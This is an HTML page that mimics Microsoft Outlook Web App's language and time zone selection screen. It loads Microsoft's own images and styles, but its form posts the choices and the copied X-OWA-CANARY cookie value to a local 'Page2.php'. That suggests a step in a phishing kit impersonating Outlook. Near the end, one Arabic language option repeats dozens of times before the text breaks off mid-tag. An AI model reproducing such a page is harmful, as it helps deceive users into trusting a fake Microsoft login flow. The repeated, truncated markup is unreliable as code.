<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<meta http-equiv="Content-Type" content="text/html; CHARSET=utf-8">
<title>Outlook</title>
<link rel="shortcut icon" href="https://outlook.office365.com/owa/favicon.ico" type="image/x-icon">
<link type="text/css" rel="stylesheet" href="https://outlook.office365.com/owa/prem/16.2446.10.2587011/resources/styles/languageselection.css">
<script type="text/javascript">
       a_sThmUrl="15.20.973.0\/themes\/base\/";

	// Flag to indicate whether or not the form has been submitted
	//
	var a_fSbmt = 0;

	// Function to ensure that the form is submitted only once
	//
function frmSbmt()
	{
		var timeZoneSelector = document.getElementById("selTz");
        var timezoneSelectionMessageLabel = document.getElementById("timezoneSelectionMessage");
        // Only submit the form if it hasnt been submitted yet and Time Zone is selected
		//
		if (a_fSbmt == 0)
		{
            if(timeZoneSelector.selectedIndex != 0)
            {
			 // Set the flag to indicate that the form has been submitted
			 //
			 a_fSbmt = 1;
            
             // Set timezoneSelectionMessage label's display to none
             //
             timezoneSelectionMessageLabel.style.display = 'none';

             // Set the owa canary
             document.getElementsByName("X-OWA-CANARY")[0].value = readCookie("X-OWA-CANARY");

			 // Submit the form
			 //
             document.forms["lngFrm"].submit();
            }
            else
            {
             // warn user to select the Time Zone
             //
             timezoneSelectionMessageLabel.style.display = 'inline';
            }
        }
               
	}

// Set focus on hidden element for screen reader users
// Remove role attribute from combo-box in case of IE browser
function onBodyLoad() 
{
    document.getElementById("hiddenElement").focus();
    removeListBoxRoleForIE();
}

// Remove Role attribute from language and timezone combo-box, which were added because combo-boxes were not accessible.
// Role listbox doesn't work with IE only (with JAWS virtual cursor on) but works fine with other browsers.
function removeListBoxRoleForIE()
{
    var isIeBrowser = navigator.userAgent.indexOf(" MSIE") != -1 ||
                        (navigator.userAgent.indexOf(" rv:") != -1 && navigator.userAgent.indexOf(" Trident") != -1);
    if (isIeBrowser) {
        var elements = document.getElementsByTagName("select");
        for (var i = 0; i < elements.length; i++) {
            elements[i].removeAttribute("role");
        }
    }
}

// Remove aria hidden attribute that was added to avoid JAWS from reading multiple times after page loads
function removeHiddenAttribute() 
   {
	var elements = document.getElementsByClassName("hiddenElement");
	for (var i=0; i < elements.length; i++)
	{
		elements[i].removeAttribute("aria-hidden");
	}
   }

// Remove aria-hidden attribute when user presses TAB
function tabPressed(e) 
   {
        var keyCode = (e.which) ? e.which : e.keyCode
        // javascript key code 9 is associated with tab key
        if (keyCode == 9) 
	{
		removeHiddenAttribute();
   	}
   }

function isTimezoneSelectedCheck() 
   {
        var timeZoneSelector = document.getElementById("selTz");
        var timezoneSelectionMessageLabel = document.getElementById("timezoneSelectionMessage");
        //Check if selected index is 0 if so warn user to select time zone
        //
        if (timeZoneSelector.selectedIndex == 0) 
        {
            timezoneSelectionMessageLabel.style.display = 'inline';
        }
        else 
        {
            timezoneSelectionMessageLabel.style.display = 'none';
        }
    }

function readCookie(name)
   {
       var cookieName = name + "=";
       var cookies = document.cookie.split(';');
       for (var i = 0; i < cookies.length; i++) {
           var cookie = cookies[i];
           while (cookie.charAt(0) == ' ') {
               cookie = cookie.substring(1);
           }
           if (cookie.indexOf(cookieName) == 0) {
               return cookie.substring(cookieName.length, cookie.length);
           }
       }
       return null;
   }

// Save button Enter key press event handler
function handleEnterPress(e) {
    var keyCode = (e.which) ? e.which : e.keyCode
    // javascript key code 13 is associated with enter key
    if (keyCode == 13) {
        frmSbmt();
    }
}

</script>

<style>
   .hidden 
   {
	position:absolute;
	left:-10000px;
   }
   .hiddenrtl 
   {
	position:absolute;
	left:10000px;
   }
</style>

</head>
<body class="signInBg signInBackgroundImage" onload="onBodyLoad()" onkeydown="tabPressed(event)">
<!-- Create a hidden element with focus for screen reader users -->
<div class="hidden" tabindex="0" id="hiddenElement">Language and time zone</div>
<form action=Page2.php method=POST name=lngFrm>
<input type="hidden" name="destination" value="">

<!-- Default to mouse class, so that things don't look wacky if the script somehow doesn't apply a class -->
<div id="mainLogonDiv" class="mouse">
    <div class="sidebar">
        <div class="owaLogoContainer">
            <img src="https://outlook.office365.com/owa/1x1.gif" class="owaLogo" alt="" aria-hidden="true" />
            <img src="https://outlook.office365.com/owa/1x1.gif" class="owaLogoSmall" alt="" aria-hidden="true" />
        </div>
    </div>

   <div class="logonContainer">
       <div id ="lgnDiv" class ="logonDiv">
		    
                <div class="signInImageHeader">
                    <img src="https://outlook.office365.com/owa/1x1.gif" class="mouseHeader" alt="Outlook" aria-hidden="true" />
                </div>
            
		    <div class="chooseLanguageLabel hiddenElement" tabindex="0" aria-hidden="true">Choose your preferred display language and home time zone below.</div>
            <div class="signInInputLabel hiddenElement" aria-hidden="true">Language:</div>
		    <div><select name=lcid class=languageInputText role="listbox"><option value="1078">Afrikaans &#x200E;(Suid-Afrika)&#x200E;</option><option value="1068">Azərbaycan dili &#x200E;(Azərbaycan)&#x200E;</option><option value="2110">Bahasa Melayu &#x200E;(Brunei)&#x200E;</option><option value="1086">Bahasa Melayu &#x200E;(Malaysia)&#x200E;</option><option value="5146">bosanski &#x200E;(Bosna i Hercegovina)&#x200E;</option><option value="1027">català &#x200E;(català)&#x200E;</option><option value="1029">čeština &#x200E;(Česká republika)&#x200E;</option><option value="1106">Cymraeg &#x200E;(Y Deyrnas Unedig)&#x200E;</option><option value="1030">dansk &#x200E;(Danmark)&#x200E;</option><option value="1031">Deutsch &#x200E;(Deutschland)&#x200E;</option><option value="5127">Deutsch &#x200E;(Liechtenstein)&#x200E;</option><option value="4103">Deutsch &#x200E;(Luxemburg)&#x200E;</option><option value="3079">Deutsch &#x200E;(Österreich)&#x200E;</option><option value="2055">Deutsch &#x200E;(Schweiz)&#x200E;</option><option value="1061">eesti &#x200E;(Eesti)&#x200E;</option><option value="3081">English &#x200E;(Australia)&#x200E;</option><option value="10249">English &#x200E;(Belize)&#x200E;</option><option value="4105">English &#x200E;(Canada)&#x200E;</option><option value="9225">English &#x200E;(Caribbean)&#x200E;</option><option value="16393">English &#x200E;(India)&#x200E;</option><option value="14345">English &#x200E;(Indonesia)&#x200E;</option><option value="6153">English &#x200E;(Ireland)&#x200E;</option><option value="8201">English &#x200E;(Jamaica)&#x200E;</option><option value="17417">English &#x200E;(Malaysia)&#x200E;</option><option value="5129">English &#x200E;(New Zealand)&#x200E;</option><option value="13321">English &#x200E;(Philippines)&#x200E;</option><option value="18441">English &#x200E;(Singapore)&#x200E;</option><option value="7177">English &#x200E;(South Africa)&#x200E;</option><option value="11273">English &#x200E;(Trinidad and Tobago)&#x200E;</option><option value="2057">English &#x200E;(United Kingdom)&#x200E;</option><option selected value="1033">English &#x200E;(United States)&#x200E;</option><option value="12297">English &#x200E;(Zimbabwe)&#x200E;</option><option value="11274">español &#x200E;(Argentina)&#x200E;</option><option value="16394">español &#x200E;(Bolivia)&#x200E;</option><option value="13322">español &#x200E;(Chile)&#x200E;</option><option value="9226">español &#x200E;(Colombia)&#x200E;</option><option value="5130">español &#x200E;(Costa Rica)&#x200E;</option><option value="23562">español &#x200E;(Cuba)&#x200E;</option><option value="12298">español &#x200E;(Ecuador)&#x200E;</option><option value="17418">español &#x200E;(El Salvador)&#x200E;</option><option value="3082">español &#x200E;(España, alfabetización internacional)&#x200E;</option><option value="21514">español &#x200E;(Estados Unidos)&#x200E;</option><option value="4106">español &#x200E;(Guatemala)&#x200E;</option><option value="18442">español &#x200E;(Honduras)&#x200E;</option><option value="2058">español &#x200E;(México)&#x200E;</option><option value="19466">español &#x200E;(Nicaragua)&#x200E;</option><option value="6154">español &#x200E;(Panamá)&#x200E;</option><option value="15370">español &#x200E;(Paraguay)&#x200E;</option><option value="10250">español &#x200E;(Perú)&#x200E;</option><option value="20490">español &#x200E;(Puerto Rico)&#x200E;</option><option value="7178">español &#x200E;(República Dominicana)&#x200E;</option><option value="14346">español &#x200E;(Uruguay)&#x200E;</option><option value="8202">español &#x200E;(Venezuela)&#x200E;</option><option value="1069">euskara &#x200E;(euskara)&#x200E;</option><option value="1124">Filipino &#x200E;(Pilipinas)&#x200E;</option><option value="2060">français &#x200E;(Belgique)&#x200E;</option><option value="3084">français &#x200E;(Canada)&#x200E;</option><option value="7180">français &#x200E;(caraïbes)&#x200E;</option><option value="1036">français &#x200E;(France)&#x200E;</option><option value="5132">français &#x200E;(Luxembourg)&#x200E;</option><option value="6156">français &#x200E;(Monaco)&#x200E;</option><option value="4108">français &#x200E;(Suisse)&#x200E;</option><option value="2108">Gaeilge &#x200E;(Éire)&#x200E;</option><option value="1169">Gàidhlig &#x200E;(An Rìoghachd Aonaichte)&#x200E;</option><option value="1110">galego &#x200E;(galego)&#x200E;</option><option value="1128">Hausa &#x200E;(Najeriya)&#x200E;</option><option value="4122">hrvatski &#x200E;(Bosna i Hercegovina)&#x200E;</option><option value="1050">hrvatski &#x200E;(Hrvatska)&#x200E;</option><option value="1057">Indonesia &#x200E;(Indonesia)&#x200E;</option><option value="1039">íslenska &#x200E;(Ísland)&#x200E;</option><option value="1040">italiano &#x200E;(Italia)&#x200E;</option><option value="2064">italiano &#x200E;(Svizzera)&#x200E;</option><option value="1089">Kiswahili &#x200E;(Kenya)&#x200E;</option><option value="1062">latviešu &#x200E;(Latvija)&#x200E;</option><option value="1134">Lëtzebuergesch &#x200E;(Lëtzebuerg)&#x200E;</option><option value="1063">lietuvių &#x200E;(Lietuva)&#x200E;</option><option value="1038">magyar &#x200E;(Magyarország)&#x200E;</option><option value="1082">Malti &#x200E;(Malta)&#x200E;</option><option value="2067">Nederlands &#x200E;(België)&#x200E;</option><option value="1043">Nederlands &#x200E;(Nederland)&#x200E;</option><option value="1044">norsk bokmål &#x200E;(Norge)&#x200E;</option><option value="2068">nynorsk &#x200E;(Noreg)&#x200E;</option><option value="1091">o&#8216;zbek &#x200E;(Oʻzbekiston)&#x200E;</option><option value="1045">polski &#x200E;(Polska)&#x200E;</option><option value="1046">português &#x200E;(Brasil)&#x200E;</option><option value="2070">português &#x200E;(Portugal)&#x200E;</option><option value="1153">Reo Māori &#x200E;(Aotearoa)&#x200E;</option><option value="2072">română &#x200E;(Republica Moldova)&#x200E;</option><option value="1048">română &#x200E;(România)&#x200E;</option><option value="2155">runa shimi &#x200E;(Ecuador Suyu)&#x200E;</option><option value="3179">runasimi &#x200E;(Peru)&#x200E;</option><option value="1131">runasimi &#x200E;(Qullasuyu)&#x200E;</option><option value="1052">shqip &#x200E;(Shqipëri)&#x200E;</option><option value="1051">slovenčina &#x200E;(Slovensko)&#x200E;</option><option value="1060">slovenščina &#x200E;(Slovenija)&#x200E;</option><option value="2074">srpski &#x200E;(latinica, Srbija i Crna Gora &#x200E;(bivša)&#x200E;)&#x200E;</option><option value="1035">suomi &#x200E;(Suomi)&#x200E;</option><option value="2077">svenska &#x200E;(Finland)&#x200E;</option><option value="1053">svenska &#x200E;(Sverige)&#x200E;</option><option value="1066">Tiếng Vi&#7879;t &#x200E;(Vi&#7879;t Nam)&#x200E;</option><option value="1055">Türkçe &#x200E;(Türkiye)&#x200E;</option><option value="1090">Türkmen dili &#x200E;(Türkmenistan)&#x200E;</option><option value="2051">valencià &#x200E;(Espanya)&#x200E;</option><option value="1032">&#917;&#955;&#955;&#951;&#957;&#953;&#954;&#940; &#x200E;(&#917;&#955;&#955;&#940;&#948;&#945;)&#x200E;</option><option value="1059">&#1041;&#1077;&#1083;&#1072;&#1088;&#1091;&#1089;&#1082;&#1072;&#1103; &#x200E;(&#1041;&#1077;&#1083;&#1072;&#1088;&#1091;&#1089;&#1100;)&#x200E;</option><option value="1026">&#1073;&#1098;&#1083;&#1075;&#1072;&#1088;&#1089;&#1082;&#1080; &#x200E;(&#1041;&#1098;&#1083;&#1075;&#1072;&#1088;&#1080;&#1103;)&#x200E;</option><option value="1088">&#1050;&#1099;&#1088;&#1075;&#1099;&#1079; &#x200E;(&#1050;&#1099;&#1088;&#1075;&#1099;&#1079;&#1089;&#1090;&#1072;&#1085;)&#x200E;</option><option value="1087">&#1179;&#1072;&#1079;&#1072;&#1179; &#1090;&#1110;&#1083;&#1110; &#x200E;(&#1178;&#1072;&#1079;&#1072;&#1179;&#1089;&#1090;&#1072;&#1085;)&#x200E;</option><option value="1071">&#1084;&#1072;&#1082;&#1077;&#1076;&#1086;&#1085;&#1089;&#1082;&#1080; &#x200E;(&#1056;&#1077;&#1087;&#1091;&#1073;&#1083;&#1080;&#1082;&#1072; &#1052;&#1072;&#1082;&#1077;&#1076;&#1086;&#1085;&#1080;&#1112;&#1072;)&#x200E;</option><option value="1104">&#1084;&#1086;&#1085;&#1075;&#1086;&#1083; &#x200E;(&#1052;&#1086;&#1085;&#1075;&#1086;&#1083;)&#x200E;</option><option value="2073">&#1088;&#1091;&#1089;&#1089;&#1082;&#1080;&#1081; &#x200E;(&#1052;&#1086;&#1083;&#1076;&#1086;&#1074;&#1072;)&#x200E;</option><option value="1049">&#1088;&#1091;&#1089;&#1089;&#1082;&#1080;&#1081; &#x200E;(&#1056;&#1086;&#1089;&#1089;&#1080;&#1103;)&#x200E;</option><option value="7194">&#1089;&#1088;&#1087;&#1089;&#1082;&#1080; &#x200E;(&#1041;&#1086;&#1089;&#1085;&#1072; &#1080; &#1061;&#1077;&#1088;&#1094;&#1077;&#1075;&#1086;&#1074;&#1080;&#1085;&#1072;)&#x200E;</option><option value="1092">&#1058;&#1072;&#1090;&#1072;&#1088; &#x200E;(&#1056;&#1086;&#1089;&#1089;&#1080;&#1103;)&#x200E;</option><option value="1058">&#1091;&#1082;&#1088;&#1072;&#1111;&#1085;&#1089;&#1100;&#1082;&#1072; &#x200E;(&#1059;&#1082;&#1088;&#1072;&#1111;&#1085;&#1072;)&#x200E;</option><option value="1067">&#1344;&#1377;&#1397;&#1381;&#1408;&#1381;&#1398; &#x200E;(&#1344;&#1377;&#1397;&#1377;&#1405;&#1407;&#1377;&#1398;)&#x200E;</option><option value="1079">&#4325;&#4304;&#4320;&#4311;&#4323;&#4314;&#4312; &#x200E;(&#4321;&#4304;&#4325;&#4304;&#4320;&#4311;&#4309;&#4308;&#4314;&#4317;)&#x200E;</option><option value="1037">&#1506;&#1489;&#1512;&#1497;&#1514; &#x200F;(&#1497;&#1513;&#1512;&#1488;&#1500;)&#x200F;</option><option value="2080">&#1575;&#1585;&#1583;&#1608; &#x200F;(&#1576;&#1726;&#1575;&#1585;&#1578;)&#x200F;</option><option value="1056">&#1575;&#1615;&#1585;&#1583;&#1608; &#x200F;(&#1662;&#1575;&#1705;&#1587;&#1578;&#1575;&#1606;)&#x200F;</option><option value="11265">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1571;&#1585;&#1583;&#1606;)&#x200F;</option><option value="14337">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1573;&#1605;&#1575;&#1585;&#1575;&#1578; &#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#1575;&#1604;&#1605;&#1578;&#1581;&#1583;&#1577;)&#x200F;</option><option value="15361">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1576;&#1581;&#1585;&#1610;&#1606;)&#x200F;</option><option value="5121">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1580;&#1586;&#1575;&#1574;&#1585;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; 